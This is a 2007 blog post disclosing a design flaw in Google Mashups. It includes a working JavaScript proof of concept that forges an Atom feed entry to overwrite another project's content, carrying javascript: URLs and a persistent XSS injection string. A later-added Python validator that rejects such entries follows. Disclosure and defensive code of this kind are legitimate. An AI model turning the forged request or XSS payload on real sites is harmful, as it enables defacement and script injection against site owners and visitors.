Friday, September 28, 2007

Google Mashups Vulnerability

Yay, I wanted to be part of this hell of a week (Google's Dark Week).

Here is the vulnerability I reported to Google; it appears to be a "design error" (and there is no fix without breaking other things).

With this vulnerability you can "deface" any Google Mashups project by crafting your own XML-RPC request to the GWT server and changing the contents of any feed.

The report I sent to Google is this:

Suppose you are the creator of http://gallery.googlemashups.com/.
If you include a list for a local feed, then any attacker in the world will be able to modify all the content on your website.

This is maybe a design error, and as I see it, it's pretty difficult to fix.

I've made a demonstration on http://gallery.googlemashups.com/.
Enter the website and go to the last page; there you will see that the last item was modified.

To do so, you just need to execute the following code:


// PoC from the report; the Atom body is the original's %-escaped payload decoded,
// and the X-Gm-Validate value is the placeholder used in the report.
var entry =
  '<?xml version="1.0" encoding="UTF-8" ?>\r\n' +
  '<atom:entry xmlns:gmd="http://schemas.google.com/gmd/2007" g="com.google.gwt.core.client.JavaScriptObject"' +
  ' xmlns:atom="http://www.w3.org/2005/Atom" xmlns:gd="http://schemas.google.com/g/2005" xmlns:gm="http://base.google.com/ns-metadata/1.0"' +
  ' xmlns:g="http://base.google.com/ns/1.0" xmlns:gCal="http://schemas.google.com/gCal/2005" xmlns:st="http://schemas.google.com/st/2006"' +
  ' xmlns:apps="http://schemas.google.com/apps/2006" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml"' +
  ' xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:media="http://search.yahoo.com/mrss" xmlns:georss="http://www.georss.org/georss=georss"' +
  ' xmlns:gml="http://www.opengis.net/gml=gml" xmlns:exif="http://schemas.google.com/photos/exif/2007=exif" xmlns:gms="http://schemas.google.com/gms/2007"' +
  ' xmlns="http://www.w3.org/2005/Atom">\r\n' +
  '<id>http://gallery.googlemashups.com/feeds/app/galleryApps/1</id>\r\n' +
  '<published>2007-09-08T00:19:48.625Z</published>\r\n<updated>2007-09-08T00:19:48.625Z</updated>\r\n' +
  '<title type="text">MODIFIED!!!!!!!!!!!!</title>\r\n<content type="text">MODIFIED!!!!!!!!!!!</content>\r\n' +
  '<link rel="self" type="application/atom xml" href="http://1.1.test-c2ba4a99655691ea.googlemashups.com/feeds/app/galleryApps/1"/>\r\n' +
  '<link rel="edit" type="application/atom xml" href="http://1.1.test-c2ba4a99655691ea.googlemashups.com/feeds/app/galleryApps/1/0"/>\r\n' +
  "<gd:appLink>javascript:alert('GoogleMashups design error?');</gd:appLink>\r\n" +
  "<gd:imgURL>javascript:alert('GoogleMashups design error?');</gd:imgURL>\r\n" +
  '<gmd:author>MODIFIED!!!!!!!!!!</gmd:author>\r\n</atom:entry>';
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://gallery.googlemashups.com/feeds/app/galleryApps", true);
xhr.setRequestHeader("Content-Type", "application/atom+xml; charset=utf-8");
xhr.setRequestHeader("X-Gm-Validate", "ASDFGHJKLÑPQWERRTYUIOPZXCVBNMUJHFDDDEFFDSSCFGGTFDQWERTYUIYTRREWWWQQ");
xhr.setRequestHeader("X-GData-Client", "JavaScript-V1.0-Google Mashup Editor");
xhr.onreadystatechange = function () { // handler registered before send()
  if (xhr.readyState == 4) alert(xhr.responseText);
};
xhr.send(entry);

You can get the X-Gm-Validate token by sniffing your connection; the modification of the feeds doesn't require validation of any type.

Well, that's the first part.
With this information you can modify the content of any item in the feed, but that's not all.
The information passed is not validated at all! So by means of:
link=blah">XSS

I could do a persistent XSS attack; this could completely destroy the project, deface it, or anything else.

If you need me to explain further please tell me.
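
A defender's counterpart to the report above, added here and not part of the original post or of Google Mashups: a server-side validator that rejects the kind of entry the report sends (javascript: URLs in gd:appLink, gd:imgURL and link/@href, and markup in text fields) before it is stored. Element names and namespaces follow the report's payload; the sample entry and the example.com URLs are constructed.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Namespaces used by the entry in the report above.
NS = {"atom": "http://www.w3.org/2005/Atom", "gd": "http://schemas.google.com/g/2005",
      "gmd": "http://schemas.google.com/gmd/2007"}
SAFE_SCHEMES = {"http", "https"}
URL_FIELDS = ("gd:appLink", "gd:imgURL")                     # element text carries a URL
TEXT_FIELDS = ("atom:title", "atom:content", "gmd:author")   # plain text only

def _safe_url(value):
    """Absolute http(s) only; rejects javascript:, data:, vbscript: and relative values."""
    parts = urlsplit(value.strip())
    return parts.scheme.lower() in SAFE_SCHEMES and bool(parts.netloc)

def validate_entry(xml_bytes):
    """Return a list of violations; an empty list means the entry may be stored."""
    problems = []
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    for tag in URL_FIELDS:
        for el in root.findall(tag, NS):
            if not _safe_url(el.text or ""):
                problems.append(f"{tag}: unsafe URL {el.text!r}")
    for el in root.findall("atom:link", NS):
        if not _safe_url(el.get("href", "")):
            problems.append(f"link[rel={el.get('rel')}]: unsafe href")
    for tag in TEXT_FIELDS:            # no markup smuggled in via type="html" or raw tags
        for el in root.findall(tag, NS):
            if el.get("type", "text") != "text" or "<" in (el.text or ""):
                problems.append(f"{tag}: markup not allowed")
    return problems

# Constructed sample shaped like the report's entry, with one javascript: URL.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<atom:entry xmlns:atom="http://www.w3.org/2005/Atom"
            xmlns:gd="http://schemas.google.com/g/2005"
            xmlns:gmd="http://schemas.google.com/gmd/2007">
<atom:title type="text">Demo app</atom:title>
<atom:link rel="edit" href="http://example.com/feeds/app/galleryApps/1/0"/>
<gd:appLink>javascript:alert(1)</gd:appLink>
<gd:imgURL>http://example.com/icon.png</gd:imgURL>
<gmd:author>someone</gmd:author>
</atom:entry>"""

if __name__ == "__main__":
    print(validate_entry(SAMPLE))
```

Scheme checking is a store-time gate only; the feed endpoint still needs to tie writes to the project owner's authenticated session, which a client-visible header cannot do.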

Well, actually there's also another XSS vulnerability in some other services; anyway, they are on their way to fixing them, so I won't disclose them here (yet).